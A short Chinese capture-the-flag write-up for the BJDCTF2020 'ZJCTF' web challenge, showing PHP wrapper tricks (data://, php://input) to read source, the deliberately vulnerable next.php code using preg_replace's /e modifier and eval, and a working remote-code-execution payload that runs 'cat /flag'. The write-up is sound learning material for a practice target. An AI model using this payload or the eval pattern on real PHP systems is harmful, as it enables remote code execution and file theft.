[BJDCTF2020]ZJCTF,不过如此 简单思路及做法

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

题目

[BJDCTF2020]ZJCTF,不过如此 简单思路及做法_第1张图片
稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题!
注释里提醒了next.php,我们同样用伪协议base64加密来读文件
data://text/plain,
[BJDCTF2020]ZJCTF,不过如此 简单思路及做法_第2张图片
php://input
[BJDCTF2020]ZJCTF,不过如此 简单思路及做法_第3张图片

读到的内容解码出来


$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
     
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
     
    echo complex($re, $str). "\n";
}

function getFlag(){
     
	@eval($_GET['cmd']);
}

preg_replace的/e参数,可以造成远程代码执行漏洞具体可以参考这篇文章:
https://xz.aliyun.com/t/2557
payload:

/next.php?\S*=${getFlag()}&cmd=system(‘cat /flag’);

在这里插入图片描述

你可能感兴趣的:(Web刷题记录,php,安全)